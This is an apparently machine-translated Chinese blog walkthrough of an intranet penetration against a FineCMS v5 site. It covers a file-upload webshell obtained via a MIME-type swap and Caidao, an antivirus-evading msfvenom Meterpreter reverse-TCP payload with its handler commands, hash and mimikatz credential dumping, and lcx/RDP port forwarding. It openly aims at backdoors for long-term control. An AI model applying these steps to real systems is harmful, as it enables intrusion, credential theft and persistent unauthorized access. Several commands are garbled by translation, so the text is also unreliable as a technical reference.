渗透网络

地观音2022-07-06  16

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等。在渗透测试的过程中,我们可以通过信息收集得到思路。

内部网渗透理念

这种内网渗透的思路是:通过信息收集分析网站,通过攻击外网服务器获得外网服务器的权限,然后以入侵成功的外网服务器为跳板攻击其他内网服务器,最后获取敏感数据(系统密码等。),并根据情况安装后门木马或后门软件,实现长期控制,获取敏感数据。还有一种内网渗透的思路:通过社工等方式,攻击企业办公网络的电脑和无线网络,从而控制办公电脑,复用获取的办公网络数据。

200渗透书籍,私信“书籍”领取

渗透过程详解这个渗透过程将分为web shell-->:getshell---- gt;请webshell访问一个网站,该网站使用FineCMS v5系统构建网站,并创建一个新用户进行测试。

初步判断网页模板是finecms v5的建站系统,然后注册了新用户,这样我们就可以利用finecms v5的文件上传漏洞了。

文件上传漏洞在会员头像里,先注册一个账号,登录后再上传我们的木马。

最初的文件格式是0x0.png通过burp代理拦截tx,并用image/php替换image/png。

输入参数v = phpinfo();验证成功。

上传成功后,打开菜刀软件,输入上传的网站路径和参数(一句话,木马的密码)。可以连接服务器,可以提高菜刀软件上的数据库权限,比如mof、udf、启动项等。

写一个免杀木马通过webshell连接目标服务器,但是访问数据是有限的,只有站点的系统账号权限,访问系统路径也是有限的,所以我们可以写一个免杀木马来弹回shell木马su.exe。

MSF venom-p windows/x64/meter preter/reverse _ TCP lhost = 192 . 168 . 10 . 130 lport = 4444-f exe gt;/root/Desktop/su.exe

只需连接菜刀,上传文件管理中我们需要的工具。

进入meterpreter攻击模块并配置参数。

使用exploit/multi/handler set payload/windows/x64/meter preter/reverse _ TCP set lport 4444 set lhost 192 . 168 . 10 . 130 run

菜刀虚拟终端可以模拟win2008服务器的操作点击免杀木马,使木马生效。

运行监控

密码获取过程

hashdumpload mimikatzkerberos

注意:如果不允许win2008的远程桌面操作连接到这台电脑,那么打开端口转发是没有用的。

打开远程桌面

思路一:使用meterpreter模块进行远程连接,然后开启端口转发。-l(本地端口)-p(远程控制端口)-r(目标主机)目标机器端口3389转发到本地端口5555。

RRD top-u username-p password 127 . 0 . 0 . 1:5555连接本地端口5555打开远程桌面。

要使用windows打开远程桌面,您需要使用lcx工具。现在,在shell模式下,目标机器执行lcx . exe-slave 192 . 168 . 10 . 20 5555 192 . 168 . 10 . 10 3389。

想法二:使用lcx工具执行远程连接。攻击机执行lcx.exe.-Listen 5555 33891,然后打开mstsc连接127.0.0.1: 33891

以下是成功的连接和监控数据传输。

总结不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等。在渗透测试的过程中,我们可以通过信息收集得到思路。

转载请注明原文地址:https://juke.outofmemory.cn/read/617772.html

最新回复(0)